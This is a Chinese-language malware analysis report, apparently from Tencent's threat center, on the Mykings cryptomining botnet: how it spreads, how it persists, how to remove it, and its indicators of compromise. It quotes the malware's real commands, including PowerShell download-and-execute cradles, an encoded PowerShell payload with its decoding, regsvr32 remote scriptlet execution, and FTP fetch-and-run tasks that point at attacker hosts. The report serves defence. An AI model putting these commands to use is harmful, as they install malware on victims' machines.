背景騰訊安全御見威脅情報(bào)中心近期檢測(cè)到Mykings挖礦僵尸網(wǎng)絡(luò)更新基礎(chǔ)設(shè)施,病毒啟用了新的域名,挖礦使用新的錢包收益已超過60萬人民幣,
背景
騰訊安全御見威脅情報(bào)中心近期檢測(cè)到Mykings挖礦僵尸網(wǎng)絡(luò)更新基礎(chǔ)設(shè)施,病毒啟用了新的域名,挖礦使用新的錢包收益已超過60萬人民幣,并且仍每天以約10個(gè)XMR的速度挖掘。
Mykings通過1433端口爆破、永恒之藍(lán)漏洞攻擊等方法進(jìn)入系統(tǒng),然后植入RAT、Miner等木馬,組成龐大的僵尸網(wǎng)絡(luò)。
Mykings挖礦僵尸網(wǎng)絡(luò)更新版本具有以下特點(diǎn):
1. 利用永恒之藍(lán)漏洞、1433端口爆破等方法進(jìn)行攻擊,并包含Mirai僵尸網(wǎng)絡(luò)的感染代碼。
2. 感染MBR(感染流程與暗云病毒一致),通過Rookit對(duì)抗殺軟以及下載Payload。
3. 清除競(jìng)品挖礦木馬,關(guān)閉端口封堵其他病毒的入侵渠道。
4. 通過安裝多個(gè)計(jì)劃任務(wù)后門、WMI后門進(jìn)行持久化。
Mykings挖礦僵尸網(wǎng)絡(luò)
詳細(xì)分析
被感染設(shè)備通過WMI后門執(zhí)行Powershell命令
$wc=New-ObjectSystem.Net.WebClient;$wc.DownloadString('http://74.222.14.94/blue.txt').trim()-split '[\r\n]+'|%{$n=$_.split('/')[-1];$wc.DownloadFile($_, $n);start $n;
然后從blue.txt中獲取3個(gè)木馬的下載地址,依次下載和執(zhí)行:
上述三個(gè)木馬分析如下:
ok.exe
ok.exe功能為感染MBR。從而實(shí)現(xiàn)自保護(hù),殺軟對(duì)抗,以及聯(lián)網(wǎng)下載payload的功能。
感染流程與騰訊御見威脅情報(bào)中心發(fā)現(xiàn)的暗云系列病毒(參考https://s.tencent.com/research/report/622.html)類似。MBR木馬在最后一個(gè)階段對(duì)ZwCreateSection進(jìn)行HOOK, 在獲得執(zhí)行機(jī)會(huì)后將rootkit映射到內(nèi)核空間并執(zhí)行,最后跳轉(zhuǎn)到ZwCreateSection繼續(xù)執(zhí)行。
Rootkit主要功能為自保護(hù), 結(jié)束殺軟進(jìn)程,及注入系統(tǒng)進(jìn)程winlogon.exe聯(lián)網(wǎng)下載payload執(zhí)行下一階段的惡意行為。
Rootkit獲取用于更新木馬的IP地址http[:]//www.upme0611.info/address.txt
獲取下一階段Payload代碼配置文件http[:]//mbr.kill0604.ru/cloud.txt,從該配置文件中得到挖礦模塊upsupx.exe的下載地址,隨后下載執(zhí)行該文件。
upsupx.exe
upsupx.exe被下載保存至C:\Windows\Temp\conhost.exe執(zhí)行。下載解密挖礦相關(guān)配置文件到C:\Program Files\Common Files\xpdown.dat,配置文件內(nèi)容如下:
45.58.135.106
74.222.14.61
139.5.177.10
ok.xmr6b.ru
獲取要清除的競(jìng)爭(zhēng)對(duì)手或者老版本的挖礦木馬,包括文件名、路徑、是否清除。
然后通過讀注冊(cè)表位置(HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0)
檢測(cè)CPU類型及頻率,根據(jù)CPU的類型和頻率確定使用哪種類型的挖礦程序。
下載開源挖礦程序XMRig,地址為http[:]//198.148.90.34/64work.rar,程序版本2.14.1,挖礦程序啟動(dòng)路徑為C:\Windows\inf\lsmm.exe
啟動(dòng)后從資源文件中獲取挖礦配置文件,得到礦池地址:pool.minexmr.com:5555
錢包455WeUnLXMi2ScZ7WLb9apVTWLe98f6zjR9Sys78txuVckB5cwsNjQyXiV9oTUXj1s93aDVWcTh2dMuMbbT5abe715dNSR2
根據(jù)錢包查詢收益:已挖礦獲得1077個(gè)XMR
當(dāng)前市場(chǎng)價(jià)格折合人民幣60萬元
u.exe
u.exe利用攻擊模塊C:\Windows\system\msinfo.exe對(duì)內(nèi)網(wǎng)以及外網(wǎng)機(jī)器IP段進(jìn)行掃描攻擊,方法包括利用永恒之藍(lán)漏洞、SQL爆破、Telnet爆破、RDP爆破等,部分攻擊payload還包含感染mirai僵尸網(wǎng)絡(luò)的相關(guān)代碼。
掃描445/1433等端口
永恒之藍(lán)漏洞攻擊
SQL爆破攻擊
爆破登錄后執(zhí)行Shellcode
Telnet爆破攻擊
RDP爆破攻擊
持久化
Myings挖礦僵尸網(wǎng)絡(luò)會(huì)使用以下手法進(jìn)行持久化:
1. 刪除其他病毒設(shè)置的登錄賬戶
通過net user刪除賬戶mm123$、admin、sysadm05;attrib命令設(shè)置Temp目錄下文件為隱藏屬性;taskkill殺死其他挖礦進(jìn)程,刪除其他挖礦進(jìn)程文件、遠(yuǎn)程桌面程序文件;cacls設(shè)置部分目錄及文件的可見性。
通過wmic命令刪除偽裝成系統(tǒng)進(jìn)程的挖礦程序,判斷依據(jù)為文件為系統(tǒng)進(jìn)程名,但是卻不在系統(tǒng)目錄下。
2.設(shè)置相關(guān)文件、路徑的屬性為隱藏
3.關(guān)閉系統(tǒng)自更新
刪除以下計(jì)劃任務(wù),關(guān)閉系統(tǒng)自更新:
SCHTASKS/Delete/TN"WindowsUpdate1"/F&SCHTASKS/Delete/TN"WindowsUpdate3"/F&SCHTASKS/Delete/TN"Windows_Update"/F&SCHTASKS/Delete/TN"Update"/F&SCHTASKS/Delete/TN"Update2"/F&SCHTASKS/Delete/TN"Update4"/F&SCHTASKS/Delete/TN"Update3"/F&SCHTASKS/Delete/TN"windowsinit"/F&SCHTASKS/Delete/TN"SystemSecurityCheck"/F&SCHTASKS/Delete/TN"AdobeFlashPlayer"/F&SCHTASKS/Delete/TN"updat_windows"/F&SCHTASKS/Delete/TN"at1"/F&SCHTASKS/Delete/TN"at2"/F&SCHTASKS/Delete/TN"MicrosoftLocalManager[WindowsServer2008R2Enterprise]"/F&SCHTASKS/DELETE/TN"\Microsoft\Windows\UPnP\Services"/f&SCHTASKS/Delete/TN"MicrosoftLocalManager[WindowsServer2008R2Standard]"/F
4.阻止139/445等端口的連接
網(wǎng)絡(luò)防火墻設(shè)置,設(shè)置65536端口的連接請(qǐng)求為允許,設(shè)置135/137/138/139/445端口的連接為拒絕。
5.添加注冊(cè)表啟動(dòng)項(xiàng)
添加注冊(cè)表Run啟動(dòng)項(xiàng):
6.添加大量計(jì)劃任務(wù)后門
添加5個(gè)計(jì)劃任務(wù):
任務(wù)1:Mysa
執(zhí)行:cmd /c echo openftp.0603bye.info>s&echo test>>s&echo 1433>>s&echobinary>>s&echo get a.exe c:\windows\update.exe>>s&echobye>>s&ftp -s:s&c:\windows\update.exe
任務(wù)2:Mysa1
執(zhí)行:rundll32.exe C:\windows\debug\item.dat,ServiceMain aaaa
任務(wù)3:Mysa2
執(zhí)行:cmd /c echo open ftp.0603bye.info>p&echotest>>p&echo 1433>>p&echo get s.datc:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
任務(wù)4:Mysa3
執(zhí)行:/c echo openftp.0603bye.info>ps&echo test>>ps&echo 1433>>ps&echoget s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp-s:ps&c:\windows\help\lsmosee.exe
任務(wù)5:ok
執(zhí)行:cmd c:\windows\debug\ok.dat,ServiceMainaaaa
各計(jì)劃任務(wù)后門功能整理如下:
7.添加執(zhí)行大量命令的WMI后門
通過創(chuàng)建WMI事件過濾器和消費(fèi)者來添加后門。
刪除舊的事件過濾器和消費(fèi)者:
fuckyoumm2_filterfuckyoumm2_consumerWindowsEventsFilterWindowsEventsConsumer4WindowsEventsConsumerfuckayoumm3fuckayoumm4
創(chuàng)建新的事件過濾器和消費(fèi)者:
fuckyoumm3
fuckyoumm4
WMI后門執(zhí)行的代碼為:
(1)powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="
(解碼后:
$wc=New-ObjectSystem.Net.WebClient;$wc.DownloadString('http[:]//wmi.1217bye.host/2.txt').trim()-split '[\r\n]+'|%{$n=$_.split('/')[-1];$wc.DownloadFile($_, $n);start $n;})
(2)powershell.exe IEX
(New-Object system.Net.WebClient).DownloadString('http[:]//wmi.1217bye.host/S.ps1')
(3)powershell.exe IEX
(New-Object system.Net.WebClient).DownloadString('http[:]//173.208.139.170/s.txt')
(4)powershell.exe IEX
(New-Objectsystem.Net.WebClient).DownloadString('http[:]//139.5.177.19/s.jpg')||regsvr32/u /s /i:http[:]//wmi.1217bye.host/1.txt scrobj.dll
(5)regsvr32 /u /s/i:http[:]//173.208.139.170/2.txt scrobj.dll
(6)regsvr32 /u /s/i:http[:]//139.5.177.19/3.txt scrobj.dll
WMI后門執(zhí)行的命令功能整理如下:
安全建議
1、MS010-17 “永恒之藍(lán)”漏洞
服務(wù)器暫時(shí)關(guān)閉不必要的端口(如135、139、445),方法可參考:https://guanjia.qq.com/web_clinic/s8/585.html
下載并更新Windows系統(tǒng)補(bǔ)丁,及時(shí)修復(fù)永恒之藍(lán)系列漏洞
XP、WindowsServer2003、win8等系統(tǒng)訪問:http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598
Win7、win8.1、WindowsServer 2008、Windows10,WindowsServer2016等系統(tǒng)訪問:https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx
2、服務(wù)器使用高強(qiáng)度密碼,切勿使用弱口令,防止黑客暴力破解;
3、使用殺毒軟件攔截可能的病毒攻擊;
4、感染Mykings病毒的用戶除了使用騰訊御點(diǎn)進(jìn)行查殺外,還可通過以下步驟進(jìn)行手動(dòng)清理:
1)刪除文件
C:\Windows\System32\ok.exe
C:\WINDOWS\system32\max.exe
C:\Windows\SysWOW64\drivers\64.exe
C:\WINDOWS\system\downs.exe
C:\WINDOWS\Temp\conhost.exe
C:\windows\system32\upsupx.exe
C:\Windows\inf\lsmm.exe
C:\WINDOWS\inf\msief.exe
C:\windows\system32\s.exe
C:\WINDOWS\system\msinfo.exe
C:\Windows\Help\lsmosee.exe
C:\windows\debug\lsmosee.exe
C:\windows\debug\item.dat
2)刪除注冊(cè)表
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\start
HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run\start
3)刪除計(jì)劃任務(wù)
Mysa
Mysa1
Mysa2
Mysa3
ok
4)刪除WMI事件過濾器及消費(fèi)者
fuckyoumm2_filter fuckyoumm2_consumer WindowsEventsFilter WindowsEventsConsumer4 WindowsEventsConsumer fuckayoumm3 fuckayoumm4
fuckyoumm3
fuckyoumm4
IOCs
MD5
9F86AFAE88B2D807A71F442891DFE3D4
147BA798E448EB3CAA7E477E7FB3A959
B89B37A90D0A080C34BBBA0D53BD66DF
1A5EC4861CC11742D308145C32A3842A
5835094B232F999C20FE2B76E9673455
49CC3130496079EBFEA58A069AA4B97A
E5F19CBFBBABA501D4D9A90856FF17D3
A1B9F55BF93E82550B4C21CD3230C3C3
1F0EC5A4B101837EA7CD08FCB3247B2B
FA066F84F3D657DFB9ADF8E0F92F03E7
A1B9F55BF93E82550B4C21CD3230C3C3
IP
139.5.177.10
74.222.14.94
208.110.71.194
80.85.152.247
66.117.2.182
70.39.124.70
150.107.76.227
103.213.246.23
45.58.135.106
103.95.28.54
74.222.14.61
198.148.90.34
185.22.172.13
223.25.247.240
192.187.111.66
66.117.6.174
173.208.139.170
139.5.177.19
173.247.239.186
79.124.78.127
78.142.29.152
74.222.14.61
54.255.141.50
Domain
www.upme0611.info
mbr.kill0604.ru
ok.xmr6b.ru
js.0603bye.info
pc.pc0416.xyz
down2.b5w91.com
wmi.1217bye.host
down.mys2018.xyz
URL
http[:]//74.222.14.94/blue.txt
http[:]//js.0603bye.info:280/v.sct
http[:]//173.247.239.186/ok.exe http[:]//139.5.177.10/upsupx.exe http[:]//139.5.177.10/u.exe
http[:]//185.22.172.13/upsupx.exe
http[:]//www.upme0611.info/address.txt
http[:]//103.213.246.23/address.txt
http[:]//208.110.71.194/cloud.txt
http[:]//mbr.kill0604.ru/cloud.txt
http[:]//mbr.kill0604.ru/TestMsg64.tmp
http[:]//mbr.kill0604.ru/TestMsg.tmp
http[:]//45.58.135.106/kill.txt
http[:]//45.58.135.106/md5.txt
http[:]//45.58.135.106/xpxmr.dat
http[:]//198.148.90.34/64.rar
http[:]//45.58.135.106/vers1.txt
http[:]//208.110.71.194/cloud.txt
http[:]//185.22.172.13/upsupx.exe
http[:]//ok.xmr6b.ru/xpdown.dat
http[:]//ok.xmr6b.ru/ok/vers.html
http[:]//ok.xmr6b.ru/ok/down.html
http[:]//198.148.90.34/64work.rar
http[:]//198.148.90.34/upsupx.exe
http[:]//198.148.90.34/b.exe
http[:]//198.148.90.34/b2.exe
http[:]//198.148.90.34:808/b2.exe
http[:]//198.148.90.34/cudart32_65.dll
http[:]//198.148.90.34/0228.rar
http[:]//223.25.247.240/ok/ups.html
http[:]//173.208.139.170/up.txt
https[:]//173.208.139.170/s.txt
http[:]//173.208.139.170/2.txt
http[:]//wmi.1217bye.host/2.txt
http[:]//wmi.1217bye.host/S.ps1
http[:]//173.208.139.170/s.txt
http[:]//139.5.177.19/s.jpg
http[:]//wmi.1217bye.host/1.txt
http[:]//173.208.139.170/2.txt
http[:]//139.5.177.19/3.txt
http[:]//173.247.239.186/max.exe
http[:]//173.247.239.186/ups.exe
http[:]//173.247.239.186/upsupx.exe
http[:]//139.5.177.19/l.txt
http[:]//79.124.78.127/up.txt
錢包:455WeUnLXMi2ScZ7WLb9apVTWLe98f6zjR9Sys78txuVckB5cwsNjQyXiV9oTUXj1s93aDVWcTh2dMuMbbT5abe715dNSR2
參考鏈接
https://www.freebuf.com/articles/web/146393.html
https://s.tencent.com/research/report/622.html
https://www.freebuf.com/column/187489.html
來源:騰訊御見威脅情報(bào)中心